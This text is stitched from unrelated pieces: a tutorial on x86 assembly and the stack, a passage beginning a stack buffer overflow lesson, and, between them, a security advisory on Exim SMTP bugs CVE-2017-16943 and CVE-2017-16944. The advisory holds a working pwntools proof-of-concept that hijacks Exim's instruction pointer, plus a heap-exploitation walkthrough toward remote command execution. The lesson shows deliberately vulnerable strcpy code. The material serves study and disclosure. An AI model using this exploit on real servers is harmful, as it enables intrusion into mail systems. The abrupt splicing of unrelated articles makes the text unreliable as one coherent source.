In order to make sure all C/C++ developers will understand, I will explain first what happens with a C/C++ code when it is compiled. Let’s take the following code:
#include <stdio.h>
int main()
{
puts("RST rullz");
return 0;
}
The compiler will translate the code into assembly language, which will be translated later into machine code, that can be understood by the processor.
The ASM generated code will look similar to the following one:
We can see a series of bytes: 0x68 0xF4 0x20 0x03 0x00 0xFF 0x15 0xA0 0x20 0x03 0x00 0x83 0xC4 0x04 0x33 0xC0 0xC3. On the right, we can see the instructions that were assembled to those bytes. In other words, the processor will read the bytes and process them as assembly code.
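To make the relation between those bytes and the instructions more concrete, here is a small Python sketch that splits exactly this byte sequence into instructions. It is not a disassembler: the table only covers the five encodings that appear in this listing, and the text templates are just an illustration of how a debugger might print them.

```python
import struct

code = bytes.fromhex("68F4200300" "FF15A0200300" "83C404" "33C0" "C3")

# (opcode bytes, total instruction length, text template).
# Only the encodings present in the listing above are handled.
PATTERNS = [
    (b"\x68", 5, "PUSH 0x{imm:08X}"),
    (b"\xFF\x15", 6, "CALL DWORD PTR DS:[0x{imm:08X}]"),
    (b"\x83\xC4", 3, "ADD ESP, {imm8}"),
    (b"\x33\xC0", 2, "XOR EAX, EAX"),
    (b"\xC3", 1, "RETN"),
]


def decode(code):
    """Return a list of (hex bytes, instruction text) pairs."""
    out = []
    pos = 0
    while pos < len(code):
        for opcode, length, template in PATTERNS:
            if code.startswith(opcode, pos):
                chunk = code[pos:pos + length]
                operand = chunk[len(opcode):]
                # 4-byte operands are stored in little endian order
                imm = struct.unpack("<I", operand)[0] if len(operand) == 4 else 0
                imm8 = operand[0] if len(operand) == 1 else 0
                out.append((chunk.hex(" ").upper(),
                            template.format(imm=imm, imm8=imm8)))
                pos += length
                break
        else:
            raise ValueError(f"unknown byte 0x{code[pos]:02X} at offset {pos}")
    return out


for raw, text in decode(code):
    print(f"{raw:<20} {text}")
```

Note how the four operand bytes F4 20 03 00 turn into the address 0x000320F4; this byte order is covered in the little endian note further down.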
The processor does not understand the C/C++ variables. It has its own “variables”, more specifically, each processor has its own registers where it can store data.
A few of those registers are the following:
EAX, EBX, ECX, EDX, ESI, EDI – General purpose registers that store data.
EIP – Special register: the processor executes instructions one by one, and this register holds the address of the next instruction to execute. Let’s suppose the first instruction is available at the address 0x10000000 and that it has 3 bytes (an instruction can have one or more bytes). Initially, the value of this register is 0x10000000. After the processor executes the instruction, the EIP value will be 0x10000003.
ESP – Stack pointer: We will detail this later. For the moment it is enough to mention that a special data region, called the stack, will be used by the program, and this register holds the address of the top of the stack. We also have the EBP register, which holds the base of the current stack memory.
All these registers can store 4 bytes of data. The “E” comes from “Extended”, as 16-bit processors only had registers that could store 16 bits, such as AX, BX, CX, DX. On 64 bits, the registers can hold 64 bits: RAX, RBX etc.
A very important concept that needs to be understood when it comes to assembly language is the stack. The stack is a way to store data, piece by piece (4-byte pieces of data), where each newly added piece is placed on top of the last one. When data is removed from the stack, it is removed from the top to the bottom, piece by piece. Or, as a teacher from college used to tell us, the stack is similar to a stack of plates: you can add one only at the top, and you remove them one by one from the top to the bottom.
The stack is used at the processor level (on 32 bits) because:
local variables (inside functions) are placed on the stack
function parameters are also placed on the stack
There are also two things that we need to take care of when we work with ASM:
x86 processors are little endian: if you have a variable x = 0x11223344, its bytes are stored in memory in reverse order, as 44 33 22 11 (the least significant byte at the lowest address).
when we add a new element (4 bytes piece of memory) on the stack, the value of the ESP will be ESP-4! This is important, as the “stack grows to 0”.
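The little endian rule is easy to check from Python with the standard struct module. This is only an illustration of the byte order, not something the processor does in this form:

```python
import struct

x = 0x11223344

# "<I" means: little endian, unsigned 32-bit integer
raw = struct.pack("<I", x)

# The bytes are listed in increasing address order
print(raw.hex(" "))

# Reading the same four bytes back as little endian gives the original value
value = struct.unpack("<I", raw)[0]
print(hex(value))
```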
We have two ASM instructions that we can use to work with the stack:
PUSH – Will place a 4-byte value on the stack
POP – Will remove a 4-byte value from the stack
For example, we can have the following stack (left is the address, right is the value):
24 - 1111
28 - 2222
32 - 3333
The address on the left gets smaller as we add new items to the stack. Let’s add two new elements:
PUSH 5555
PUSH 6666
The stack will look like this:
16 - 6666
20 - 5555
24 - 1111
28 - 2222
32 - 3333
The easiest way to understand this is to think of ESP, the register that holds the top of the stack, as “how much space the stack has left for new elements”.
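The example above can be replayed with a toy model of the stack in Python. The class below is only a sketch for illustration (a dictionary of address to value plus an ESP counter), using the same simplified addresses as the listing:

```python
class Stack:
    """Toy model of the stack: address -> value, plus the ESP register."""

    def __init__(self, esp, contents):
        self.esp = esp
        self.mem = dict(contents)

    def push(self, value):
        self.esp -= 4                 # the stack grows toward lower addresses
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem.pop(self.esp)
        self.esp += 4                 # the freed slot is above the new top
        return value

    def dump(self):
        return [(addr, self.mem[addr]) for addr in sorted(self.mem)]


stack = Stack(24, {24: 1111, 28: 2222, 32: 3333})
stack.push(5555)
stack.push(6666)

for addr, value in stack.dump():
    print(addr, "-", value)
print("ESP =", stack.esp)
```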
As we already discussed, PUSH and POP instructions work with the stack. The processor executes instructions in order to do its job and each instruction has its own role. Let’s see some other instructions:
MOV – Stores data to a register
ADD – Does an addition
SUB – Does a subtraction
CALL – Calls a function
RETN – Returns from a function
JMP – Jumps to an address
XOR – Bitwise exclusive OR, for example XOR EAX, EAX is the equivalent of EAX=0
INC – Increments the value by 1 (x++)
DEC – Decrements the value by 1 (x--)
There are a lot of other instructions, but these are the most common and easy to understand. Let’s see a few examples:
ADD EAX, 5 ; Adds the value 5 to the EAX register. It is EAX = EAX + 5
SUB EDX, 7 ; Subtracts 7 from the value of the EDX register. It is EDX = EDX - 7
CALL puts ; Calls the "puts" function
RETN ; Returns from the function
JMP 0x11223344 ; Jumps to the specified address and executes the instructions from there
XOR EBX, EBX ; The equivalent of EBX = 0
MOV ECX, 3 ; The equivalent of ECX = 3
INC ECX ; The equivalent of ECX++
DEC ECX ; The equivalent of ECX--
It should be pretty easy to understand. Now we can also understand what the processor does to print our message.
PUSH OFFSET SimpleEX.@_rst_@ – I replaced the longer string with something simple. It is actually a pointer to the memory location where the “RST rullz” message is stored. The instruction places the address of our string on the stack. As a result, the value of the ESP register will be ESP – 4.
CALL DWORD PTR DS:[<&MSVCR100.puts>] – Calls the “puts” function from the “MSVCR100” (Microsoft Visual C Runtime v10) library, used by Visual Studio 2010. We will detail later how this instruction works, but before we call a function, we have to add the parameters on the stack (first instruction).
ADD ESP, 4 – Since the first instruction subtracts 4 bytes from the ESP register value, by doing this we restore those 4 bytes.
XOR EAX, EAX – This means EAX = 0. The value returned by a function will be stored in the EAX register (we have return 0 at the end of the code).
RETN – As we specified the return value with the previous instruction, we can safely return from the “main” function.
In order to better understand how a function call works, let’s take the following example:
#include <stdio.h>
int functie(int a, int b)
{
return a + b;
}
int main()
{
functie(5, 6);
return 0;
}
The “main” function will look in ASM code like this:
Note: Visual Studio is smart enough to compute the result of the addition (5 + 6 = 11) at compile time. For tests, you can completely disable the compiler optimizations from Properties > C++ > Optimization.
We can see some common instructions for both functions:
PUSH EBP – At the beginning of the functions
MOV EBP, ESP – At the beginning of the functions
POP EBP – At the end of the functions
Well, these instructions create “stack frames”. Their role is to separate the function calls on the stack, so that the EBP and ESP registers (the base and the top of the stack) delimit the stack memory area used by the currently called function. In other words, using these instructions, the EBP register will hold the address where the data (local variables) used by the current function begins and the ESP register will hold the address where the data used by the current function ends.
Let’s start with the function that does the addition.
MOV EAX,DWORD PTR SS:[EBP+8]
ADD EAX,DWORD PTR SS:[EBP+C]
Don’t be scared by the “DWORD PTR SS:[EBP+8]” stuff. As we previously discussed, between EBP and ESP we can find the data used by the function. In this case, the data we need are the parameters of the function. The parameters are available on the stack and they are relative to the EBP address, at EBP+8 and EBP+C (0xC == 12).
Also, in ASM, the square brackets are used like “*” in C/C++ when it comes to pointers. As *p means “the value at the address p”, [EBP] means “the value at the address stored in the EBP register”. It is required to do this because the EBP register contains a memory address as a value and we need the value that is stored at that memory location.
Another thing to notice is that “DWORD” specifies that there is a 4-byte value at the given address. There are a few keywords that specify the size of the data:
BYTE – 1 byte
WORD – 2 bytes
DWORD – 4 bytes (Double WORD)
The SS (Stack Segment), DS (Data Segment) or CS (Code segment) are other registers that identify different memory regions/segments: stack, data or code, and each of those locations has its own access rights: read, write or execute.
So what do those two instructions do? The first instruction will place the value of the parameter “a”, the first parameter, in the EAX register. The second instruction will add the value of the second parameter, “b”, to the EAX register. So, in the end, the EAX register will contain the “a+b” value and this value will be returned by the function on RETN.
Let’s go now to the function that calls the addition function.
PUSH 6
PUSH 5
CALL SimpleEX.functie
ADD ESP,8
We remember that the function call is “functie(5, 6)”. Well, in order to call a function, we have to do the following:
Put the parameters on the stack, from right to left, so first 6, second 5
Call the function
Clear the space allocated for the parameters (4 bytes * 2 parameters)
So, we place the two parameters on the stack (32 bits or 4 bytes each parameter): first we add 6 to the stack, followed by 5, we call the function and clean the stack. In order to clean the stack, we just add 8 to the ESP value (the two parameters size) in order to restore it to the value before the function call. We previously discussed that it is possible to use POP instruction to remove data from the stack, but in this case, there would be two POP instructions. If we would call a function with 100 parameters, we would have to do 100 POP instructions, and we can do it easier and faster with a single “ADD ESP” instruction.
Note: This is important, but not for the purpose of this article: there are multiple ways to call a function, known as “calling conventions”. The method described here, which places the parameters from right to left and cleans the stack after the function call, is called “cdecl”. Other functions, such as the functions of the Windows operating system, called the Windows API (Application Programming Interface), use a different calling convention called “stdcall”, which also places the function parameters on the stack from right to left, but the cleaning of the stack is done inside the called function, not after the “CALL” instruction.
It is also important to understand that when we call a function using the “CALL” instruction, the address of the instruction following the “CALL” instruction is placed on the stack. For example:
On the left we can see the memory addresses where the instructions are stored. Each PUSH instruction has 2 bytes. The CALL instruction, located at the address 0x00261017, has 5 bytes. So, the address following this instruction is 0x0026101C (which is 0x00261017 + 5). This is the address that will be pushed on the stack when the CALL instruction is executed.
Before the CALL instruction, the stack will look like this:
24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions
After the execution of the CALL instruction, the stack will look like this (the address values are simplified to be easier to understand):
20 - 0x0026101C ; The address of the instruction following the CALL instruction
; We need to save it in order to be able to know where to return after the function code is executed
; This is also called the "return address"
24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions
After the return address is placed on the stack, the execution will continue with the function code. The first two instructions, called the function “prologue”, are used to create the stack frame for the called function:
PUSH EBP
MOV EBP,ESP
After the PUSH instruction, the stack will look like this:
16 - 32 ; The value of EBP before the function call
20 - 0x0026101C ; The return address, where we will go back at the RETN instruction
24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions
After the “MOV EBP, ESP” instruction, EBP will hold the address of the top of the stack (the same value as ESP). It is important to note that if we use local variables inside the function, they will also be placed on the stack.
Let’s modify the function to this:
int functie(int a, int b)
{
int v1 = 3, v2 = 4;
return a + b;
}
We have now two local variables which are initialized with the values 3 and 4. The new code of the function will contain some new code:
SUB ESP,8 ; Allocate space on the stack for the two variables, 4 bytes each
MOV DWORD PTR SS:[EBP-4],3 ; Initialize the first variable
MOV DWORD PTR SS:[EBP-8],4 ; Initialize the second variable
The stack will now contain:
08 - 4 ; Second variable
12 - 3 ; First variable
16 - 32 ; The value of EBP before the function call
20 - 0x0026101C ; The return address
24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions
As a conclusion, it is important to remember the following:
local function variables are placed on the stack
the return address is also placed on the stack
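The whole sequence (cdecl call, prologue, local variables, parameter access through EBP) can be replayed with a few lines of Python. This is only a toy model that uses the simplified addresses and values from the listings above; the dictionary and the push helper are made up for the illustration:

```python
mem = {32: 0x1337}                    # anything we had before the PUSH instructions
reg = {"ESP": 32, "EBP": 32, "EAX": 0}


def push(value):
    reg["ESP"] -= 4                   # every PUSH lowers ESP by 4
    mem[reg["ESP"]] = value


# Caller, cdecl: parameters from right to left, then the CALL
push(6)                               # PUSH 6
push(5)                               # PUSH 5
push(0x0026101C)                      # CALL pushes the return address

# Callee prologue
push(reg["EBP"])                      # PUSH EBP
reg["EBP"] = reg["ESP"]               # MOV EBP, ESP

# Local variables
reg["ESP"] -= 8                       # SUB ESP, 8
mem[reg["EBP"] - 4] = 3               # MOV DWORD PTR SS:[EBP-4], 3
mem[reg["EBP"] - 8] = 4               # MOV DWORD PTR SS:[EBP-8], 4

# Function body: a + b
reg["EAX"] = mem[reg["EBP"] + 8]      # MOV EAX, DWORD PTR SS:[EBP+8]
reg["EAX"] += mem[reg["EBP"] + 0xC]   # ADD EAX, DWORD PTR SS:[EBP+C]

for addr in sorted(mem):
    print(f"{addr:02d} - {mem[addr]:#x}")
print("EAX =", reg["EAX"])
```

The parameters sit above the saved EBP and the return address, which is why they are read at EBP+8 and EBP+C, while the local variables sit below, at EBP-4 and EBP-8.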
If you have any questions, make sure you find the answers before proceeding with the stack based buffer overflow, so that you can properly understand the subject.
You can continue this article with the second part.
On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and can be triggered by unauthenticated attackers: CVE-2017-16943, a use-after-free (UAF) vulnerability that leads to Remote Code Execution (RCE), and CVE-2017-16944, a Denial-of-Service (DoS) vulnerability.
About Exim
Exim is a message transfer agent (MTA) used on Unix systems. Exim is an open source project and is the default MTA on Debian GNU/Linux systems. According to our survey, there are about 600k SMTP servers running exim on 21st November, 2017 (data collected from scans.io). Also, a mail server survey by E-Soft Inc. shows over half of the mail servers identified are running exim.
Affected
Exim version 4.88 & 4.89 with chunking option enabled.
According to our survey, about 150k servers were affected on 21st November, 2017 (data collected from scans.io).
Vulnerability Details
Through our research, the following vulnerabilities were discovered in Exim. Both vulnerabilities involve the BDAT command. BDAT is an extension of the SMTP protocol that is used to transfer large and binary data. A BDAT command looks like BDAT 1024 or BDAT 1024 LAST. With the SIZE and LAST declared, mail servers no longer need to scan for the terminating dot. This command was introduced to exim in version 4.88, and it also brought some bugs.
Use-after-free in receive_msg leads to RCE (CVE-2017-16943)
Incorrect BDAT data handling leads to DoS (CVE-2017-16944)
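As a reminder of the command syntax involved in both bugs (BDAT, a size, and an optional LAST marker), here is a minimal Python sketch of a BDAT line parser. It is an illustration only and does not mirror Exim's parsing code; the function name and error messages are made up for the example.

```python
def parse_bdat(line):
    """Parse 'BDAT <size> [LAST]' and return (size, is_last).

    Raises ValueError for anything that does not match that shape.
    """
    parts = line.strip().split()
    if not parts or parts[0].upper() != "BDAT":
        raise ValueError("not a BDAT command")
    if len(parts) < 2 or not (parts[1].isascii() and parts[1].isdigit()):
        raise ValueError("missing size for BDAT command")
    if len(parts) > 3:
        raise ValueError("too many arguments")
    is_last = False
    if len(parts) == 3:
        if parts[2].upper() != "LAST":
            raise ValueError("unexpected argument after size")
        is_last = True
    return int(parts[1]), is_last


print(parse_bdat("BDAT 1024"))
print(parse_bdat("BDAT 1024 LAST"))

try:
    parse_bdat("BDAT \x7f")           # a size that is not a number
except ValueError as err:
    print("rejected:", err)
```

A command whose size cannot be parsed, like the last one, is the kind of input that ends up on the error path discussed in the analysis below.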
Use-after-free in receive_msg leads to RCE
Vulnerability Analysis
To explain this bug, we need to start with the memory management of exim. There is a series of functions starting with store_, such as store_get, store_release and store_reset. These functions manage dynamically allocated memory and improve performance. The architecture is shown in the illustration below:
Initially, exim allocates a big storeblock (default 0x2000) and then cuts it into stores when store_get is called, using global pointers to record the size of the unused memory and where to cut for the next allocation. Once the current_block is insufficient, it allocates a new block, appends it to the end of the chain (a linked list), and then makes current_block point to it. Exim maintains three store_pools; that is, there are three chains like the one illustrated above, and all the global variables are actually arrays.
This vulnerability is in receive_msg where exim reads headers:
receive.c: 1817 receive_msg
This would look normal if the store functions behaved just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend a store, the function store_extend checks whether the old store is the latest store allocated in current_block. It returns FALSE immediately if the check fails.
store.c: 276 store_extend
Once store_extend fails, exim tries to get a new store and release the old one. After looking into store_get and store_release, we found that store_get returns a store, but store_release releases a whole block if the store is at the head of it. That is to say, if next->text points to the start of the current_block and store_get cuts a store inside it for newtext, then store_release(next->text) frees next->text, which is equal to current_block, and leaves newtext and current_block pointing to a freed memory area. Any further use of these pointers is a use-after-free. To trigger this bug, we need to make exim call store_get after next->text is allocated. This was impossible until the BDAT command was introduced into exim. BDAT makes store_get reachable and finally leads to an RCE.
Exim uses function pointers to switch between different input sources, such as receive_getc and receive_getbuf. When receiving BDAT data, receive_getc is set to bdat_getc in order to check the remaining chunk data size and to handle the command following BDAT. In receive_msg, exim also uses receive_getc. It loops to read data, stores the data into next->text, and extends the store if it is insufficient.
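The sequence described above can be reproduced with a deliberately simplified Python model of one store pool. This is not Exim's code: the class names, the bookkeeping and the sizes are assumptions made for the illustration, alignment and the block chain are ignored, and "freed" is just a flag on the block.

```python
from dataclasses import dataclass


@dataclass
class Block:
    size: int
    freed: bool = False


@dataclass
class Store:
    block: Block
    offset: int
    size: int


class StorePool:
    BLOCK_SIZE = 0x2000

    def __init__(self):
        self.current_block = None
        self.next_yield = 0        # offset of the next cut in current_block
        self.yield_length = 0      # unused bytes left in current_block

    def store_get(self, size):
        if self.current_block is None or size > self.yield_length:
            self.current_block = Block(max(size, self.BLOCK_SIZE))
            self.next_yield = 0
            self.yield_length = self.current_block.size
        store = Store(self.current_block, self.next_yield, size)
        self.next_yield += size
        self.yield_length -= size
        return store

    def store_extend(self, store, new_size):
        # Only the latest store cut from current_block can grow in place
        is_latest = (store.block is self.current_block
                     and store.offset + store.size == self.next_yield)
        grow = new_size - store.size
        if not is_latest or grow > self.yield_length:
            return False
        store.size = new_size
        self.next_yield += grow
        self.yield_length -= grow
        return True

    def store_release(self, store):
        # A store at the head of its block takes the whole block with it
        if store.offset == 0:
            store.block.freed = True


pool = StorePool()
pool.store_get(0x1F80)                  # nearly exhaust the first block
text = pool.store_get(0x100)            # plays next->text: head of a new block
pool.store_get(0x20)                    # unrelated store cut right behind it

if not pool.store_extend(text, 0x200):  # fails, text is no longer the latest
    newtext = pool.store_get(0x200)     # cut from the same current_block
    pool.store_release(text)            # frees the block newtext lives in

print("newtext in freed block:", newtext.block.freed)
print("current_block freed:", pool.current_block.freed)
```

In this model both flags end up set, which corresponds to newtext and current_block pointing into freed memory.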
receive.c: 1817 receive_msg
for (;;)
  {
  int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);

  /* If we hit EOF on a SMTP connection, it's an error, since incoming
  SMTP must have a correct "." terminator. */

  if (ch == EOF && smtp_input /* && !smtp_batched_input */)
    {
    smtp_reply = handle_lost_connection(US" (header)");
    smtp_yield = FALSE;
    goto TIDYUP;                       /* Skip to end of function */
    }
In bdat_getc, once the SIZE is reached, it tries to read the next BDAT command and raises an error message if the following command is incorrect.
smtp_in.c: 628 bdat_getc
case BDAT_CMD:
  {
  int n;

  if (sscanf(CS smtp_cmd_data, "%u %n", &chunking_datasize, &n) < 1)
    {
    (void) synprot_error(L_smtp_protocol_error, 501, NULL,
      US"missing size for BDAT command");
    return ERR;
    }
Exim usually calls synprot_error to raise an error message, which also logs it at the same time.
smtp_in.c: 628 bdat_getc
static int
synprot_error(int type, int code, uschar *data, uschar *errmess)
{
int yield = -1;

log_write(type, LOG_MAIN, "SMTP %s error in \"%s\" %s %s",
  (type == L_smtp_syntax_error)? "syntax" : "protocol",
  string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);
The log messages are made printable by string_printing. This function ensures that a string is printable. For this reason, it extends the string to escape any unprintable characters, such as '\n'->'\\n'. Therefore, it asks store_get for memory to store the escaped string.
This store makes store_extend fail in if (!store_extend(next->text, oldsize, header_size)) in receive_msg when the next extension occurs, which then triggers the use-after-free.
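Why an unprintable character forces a new allocation can be seen in a small Python sketch of such an escaping function. It is not Exim's string_printing: the function name is made up, and the octal escape format for characters other than '\n' is an assumption for the illustration. The point is only that the escaped string is longer than the input, so it cannot reuse the original storage.

```python
def escape_unprintable(s):
    """Return s with unprintable characters replaced by escape sequences."""
    out = []
    for ch in s:
        if ch == "\n":
            out.append("\\n")
        elif 32 <= ord(ch) < 127:
            out.append(ch)                    # printable ASCII stays as it is
        else:
            out.append("\\%03o" % ord(ch))    # assumed format: backslash + octal
    return "".join(out)


for command in ("BDAT 10", "BDAT \x7f"):
    escaped = escape_unprintable(command)
    needs_new_store = escaped != command      # a longer copy has to live somewhere
    print(repr(command), "->", escaped, "| new store needed:", needs_new_store)
```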
Exploitation
The following is the Proof-of-Concept (PoC) Python script for this vulnerability. This PoC takes over the control flow of the SMTP server and sets the instruction pointer to 0xdeadbeef. For fuzzing purposes, we changed the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. The version with the default configuration is also exploitable, and we will discuss it at the end of this section.
# CVE-2017-16943 PoC by meh at DEVCORE
# pip install pwntools
from pwn import *

r = remote('127.0.0.1', 25)
r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<[email protected]>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x1250+'\x7f')
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
r.send('\n')
r.interactive()
Running out of current_block
In order to achieve code execution, we need to make the next->text get the first store of a block. That is, running out of current_block and making store_get allocate a new block. Therefore, we send a long message 'a'*0x1250+'\x7f' with an unprintable character to cut current_block, making yield_length less than 0x100.
Start BDAT data transfer
After that, we send a BDAT command to start the data transfer. At the beginning, next and next->text are allocated by store_get.
The function dkim_exim_verify_init is called subsequently and it also calls store_get. Notice that this function uses ANOTHER store_pool, so it allocates from the heap without changing the current_block that next->text also points to.
receive.c: 1734 receive_msg
Call store_get inside bdat_getc
Then, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the current_block with store_get in string_printing.
Keep sending msg until extension and bug triggered
In this way, while we keep sending huge messages, current_block gets freed after the extension. In the malloc.c of glibc (so-called ptmalloc2), the allocator manages a linked list of freed memory chunks, which is called the unsorted bin. A freed chunk is put into the unsorted bin if it is not the last chunk on the heap. In step 2, dkim_exim_verify_init allocated chunks after next->text. Therefore, this chunk is put into the unsorted bin and the linked-list pointers are stored in the first 16 bytes of the chunk (on x86-64). The location written is exactly current_block->next, and therefore current_block->next is overwritten to point to the unsorted bin inside main_arena of libc (the linked-list pointer fd points back to the unsorted bin if no other freed chunk exists).
Keep sending msg for the next extension
When the next extension occurs, store_get tries to cut from main_arena, which allows attackers to overwrite all global variables below main_arena.
Overwrite global variables in libc
Finish sending message and trigger free()
In the PoC, we simply modified __free_hook and ended the line. Exim calls store_reset to reset the buffer, which calls __free_hook in free(). At this stage, we successfully controlled the instruction pointer $rip.
However, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both __free_hook and _IO_2_1_stdout_. We forged the vtable of stdout and set __free_hook to any call of fflush(stdout) inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both $rip and the content of first argument.
We consulted past CVE exploits and decided to call expand_string, which executes a command with execv if we set the first argument to ${run{cmd}}, and finally we got our RCE.
Exploit for default configured exim
When dkim is disabled, the PoC above fails because current_block is the last chunk on the heap. This makes the system merge it into the big chunk called the top chunk rather than put it into the unsorted bin.
The illustrations below describe the difference of heap layout:
To avoid this, we need to make exim allocate and free some memory before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.
After running out of current_block:
Use DATA command to send lots of data
Send huge data to make the chunk big and extend it many times. After several extensions, exim calls store_get to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we end up with a big chunk in the unsorted bin.
End DATA transfer and start a new email
Start sending a new email with the BDAT command after the heap chunk is prepared.
Adjust yield_length again
Send an invalid command with an unprintable character again to cut the current_block.
Finally the heap layout is like:
And now we can go back to the step 2 at the beginning and create the same situation. When next->text is freed, it goes back to unsorted bin and we are able to overwrite libc global variables again.
The following is the PoC for default configured exim:
A demo of our exploit is shown below.
Note that we have not found a way to leak memory addresses and therefore we use heap spray instead. Overcoming the PIE mitigation on x86-64 requires another information leakage vulnerability.
Incorrect BDAT data handling leads to DoS
Vulnerability Analysis
When receiving data with the BDAT command, an SMTP server should not consider a single dot ‘.’ on a line to be the end of the message. However, we found that exim does so in receive_msg when parsing headers, as the following output shows:
220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800
EHLO test
250-devco.re Hello root at test
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN CRAM-MD5
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
MAIL FROM:<[email protected]>
250 OK
RCPT TO:<[email protected]>
250 Accepted
BDAT 10
.
250- 10 byte chunk, total 0
250 OK id=1eJFGW-000CB0-1R
As we mentioned before, exim uses function pointers to switch the input source. This bug makes exim go into an incorrect state because the function pointer receive_getc is not reset. If the next command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. The program crashes due to stack exhaustion.
smtp_in.c: 546 bdat_getc
if (chunking_data_left > 0)
return lwr_receive_getc(chunking_data_left--);
This is not enough to pose a threat because exim runs a fork server. After a further analysis, we made exim go into an infinite loop without crashing, using the following commands.
25 November, 2017 16:27 CVE-2017-16943 Patch released
28 November, 2017 16:27 CVE-2017-16944 Patch released
3 December, 2017 13:15 Send an advisory release notification to Exim and wait for reply until now
Remarks
While we were trying to report these bugs to exim, we could not find any channel for security reports. Therefore, we followed the link on the official site for bug reports and found the security option. Unexpectedly, the Bugzilla posts all bugs publicly, and therefore the PoC was leaked. The Exim team responded rapidly and, in reaction to this, improved their security report process by adding a notification for security reports.
Credits
Vulnerabilities found by Meh, DEVCORE research team.
meh [at] devco [dot] re
In the first part of this article, we discussed the basics that we need in order to properly understand this type of vulnerability. Now that we have gone through how the compiling process works, what assembly looks like and how the stack works, we can go further and explore how a Stack Based Buffer Overflow vulnerability can be exploited.
Introduction
We previously discussed that the stack (during a function call) contains the following (in the below order, where the “local variables” are stored at the “smallest address” and “function parameters” are stored at the highest address):
Local variables of the function (for example 20 bytes)
Previous EBP value (to create the stack frame, saved with PUSH EBP)
Return address (placed on the stack by the CALL instruction)
Parameters of the function (placed on the stack using PUSH instructions)
If you can understand those things, it is easy to understand the Stack Based Buffer Overflow vulnerability. Let’s take the following example. We have the following function, called from “main” function:
#define _CRT_SECURE_NO_WARNINGS
#include "stdafx.h"
#include <stdio.h>
#include <string.h>
// Function that displays the name
void Display(char *p_pcName)
{
// Buffer (local variable) that will store the name
char buffer[20];
// We copy the name in buffer
strcpy(buffer, p_pcName);
// Display the name
printf("Hello: %s", buffer);
}
// Main function
int main()
{
Display("111122223333");
}
The program is very simple: it calls the “Display” function with the specified parameter.
We can see the problem here:
char buffer[20];
strcpy(buffer, p_pcName);
We have a local variable, buffer, which can store up to 20 bytes.
It is important to note that “char buffer[20]” is different from “char *buffer=(char*)malloc(20)” or “char *buffer=new char[20]”. Our version specifies that the buffer has 20 bytes which are directly allocated on the stack; it is a local variable that can store 20 bytes. The other two versions dynamically allocate the space for the buffer, and the data is stored in another memory region called the “heap”, not on the stack. By the way, there are also “Heap Based Buffer Overflows”, but they are more complicated.
Having a local variable that can store 20 bytes on the stack, we copy the string passed to the function into that memory location (in a real program, this string could come from the command line). What happens if the string, including its terminating NULL byte, is longer than 20 bytes? We have a “buffer overflow”. The name “Stack Based Buffer Overflow” comes from the fact that the buffer is stored on the stack.
Let’s see how the code is compiled. Please note that if you use a modern version of Visual Studio, you might get a totally different result. In order to keep everything simple, we should remove from project settings all optimizations, security features and functionalities that we don’t need.
As you can see, everything is as expected: there is only a PUSH for the “111122223333” string parameter, a function call and the stack is cleaned.
000E1000 | 55 | push ebp |
000E1001 | 8B EC | mov ebp,esp |
000E1003 | 83 EC 14 | sub esp,14 | Allocate space on the stack for the buffer
000E1006 | 8B 45 08 | mov eax,dword ptr ss:[ebp+8] | Get in EAX the string parameter address
000E1009 | 50 | push eax | Place it on the stack (second parameter)
000E100A | 8D 4D EC | lea ecx,dword ptr ss:[ebp-14] | Get in ECX the address of the "buffer"
000E100D | 51 | push ecx | Place it on the stack (first parameter)
000E100E | E8 06 0C 00 00 | call <sbof.strcpy> | Call strcpy(buffer, p_pcName);
000E1013 | 83 C4 08 | add esp,8 | Clean the stack
000E1016 | 8D 55 EC | lea edx,dword ptr ss:[ebp-14] | Get in EDX the address of the "buffer"
000E1019 | 52 | push edx | Place it on the stack (second parameter)
000E101A | 68 00 30 0E 00 | push sbof.E3000 | "Hello: %s" string
000E101F | E8 6C 00 00 00 | call <sbof.printf> | Call printf("Hello: %s", buffer);
000E1024 | 83 C4 08 | add esp,8 | Clean the stack
000E1027 | 8B E5 | mov esp,ebp |
000E1029 | 5D | pop ebp |
000E102A | C3 | ret |
The function allocates space for 20 bytes (0x14 in hexadecimal) and calls two functions:
strcpy – with two parameters: the buffer and our string (111122223333)
printf – with two parameters: “Hello: %s” string and the buffer (which now holds our string, 111122223333)
Let’s see how the stack will look AFTER the strcpy function call, so after “add esp, 8” instruction:
00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 770F8600 | The buffer has 20 bytes allocated, but there can be any data
00B9FEE0 | 000E12F7 | And those 8 bytes have junk data, as "111122223333" has 12 bytes and we allocated 20
00B9FEE4 | 00B9FEF0 | EBP saved on Display function first instruction
00B9FEE8 | 000E103D | Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function
